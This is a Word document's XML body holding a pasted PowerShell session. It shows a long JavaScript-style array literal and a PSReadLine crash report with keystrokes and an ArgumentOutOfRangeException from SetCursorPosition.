    <w:p w14:paraId="12714860" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF234FD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE79009" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D7B5A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8, 1, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C21831" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4126EA3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF50938" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6F61C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F066D6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A0C48B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A0C915" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114F1A80" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 1, 6, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B85B52" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159422D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [131, 159, 176, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F089772" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A6E35B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186CE61D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C4A806" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276EBE94" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9209C8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238E2B94" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 1, 0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202A9227" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C359D4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDFDF6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8B0D45" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23890482" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7EAD0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C15337" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA2451D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B424519" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1861A893" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [12, 34, 44, 94, 109, 257, 323]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CD6BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716C124" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC49A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA1B79A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [313]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0D4A36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE4ED75" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B76744C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A587CCC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 55, 95, 118, 185, 201, 271]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB87B3E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435CF142" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [9, 14, 7, 0, 21, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA054DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 19, 20, 21, 23, 24, 25],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E43445" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [18, 22, 32, 65, 124, 131, 133, 159, 167, 203, 207, 225, 240, 241, 256, 262, 275, 296, 314, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B60552" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF6F4DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031C35C7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C47B9F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B5BB5C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E16A40" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5EB12" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C07F8DD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E322A3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB46D82" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9C0BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC3C217" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF9C55F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5515AAB9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B43538C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9019F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 18, 20, 109, 173]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFE97C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDD00C7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C73BE1D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51470F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 37, 147, 255]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1FF333" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C1C2D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245BBD38" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E76D965" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 13, 18, 159, 245, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607EEB0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000BE416" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6339C05C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>PS C:\Users\JazmyneJosephine Mar&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3995753F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 347]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BFC19D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187361B4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D77FCAD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F253ADD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [9, 14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724FE4BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E06DFD4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C5B8A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448F8FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E84EF74" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE32469" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F89FF2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>Oops, something went wrong.  Please report this bug with the details below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1CCB8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">Report on GitHub: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>https://github.com/PowerShell/PSReadLine/issues/new</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74B9A262" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>### Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1097725B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PSReadLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 2.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0ABE24" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>PowerShell: 5.1.22621.2506</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402D1D95" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>OS: Microsoft Windows 10.0.22631</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4A0F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>Last 200 Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012EFFCB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0317B1BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> d Spacebar </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Spacebar v o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> d Spacebar 0 ) ( ) Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A72D5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve"> } </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y p e o f Spacebar w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n d o w Spacebar ! = = Spacebar " u n d e f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n e d " Spacebar &amp; &amp; Spacebar w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n d o w </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Spacebar !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = Spacebar n u l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Spacebar &amp; &amp; Spacebar w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n d o </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>w .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n d o w Spacebar = = = Spacebar w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n d o w </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Spacebar ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Spacebar w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n d o w </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Spacebar :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Spacebar t y p e of Spacebar g l o b a l Spacebar ! = =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE42C2F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                       Spacebar " u n d e f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n e d " Spacebar &amp; &amp; Spacebar g l o b a l </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Spacebar !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = Spacebar n u l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Spacebar &amp; &amp; Spacebar g l o b a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>l .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> g l o b a l Spacebar = = = Spacebar g l o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> l </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Spacebar ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Spacebar g l o b a l </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Spacebar :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Spacebar t h </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> s ) ) Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627FC749" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109"/>
    <w:p w14:paraId="5B0D2EE8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CD6FFF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109"/>
    <w:p w14:paraId="1B4E4AD4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>### Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25995B8B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0759A3A3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.ArgumentOutOfRangeException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: The value must be greater than or equal to zero and less than the console's buffer size in that dimension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E76A47" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">Parameter name: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CE4D2E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>Actual value was 1329.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417BA8BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">   at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>System.Console.SetCursorPosition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(Int32 left, Int32 top)</w:t>
      </w:r>
    </w:p>
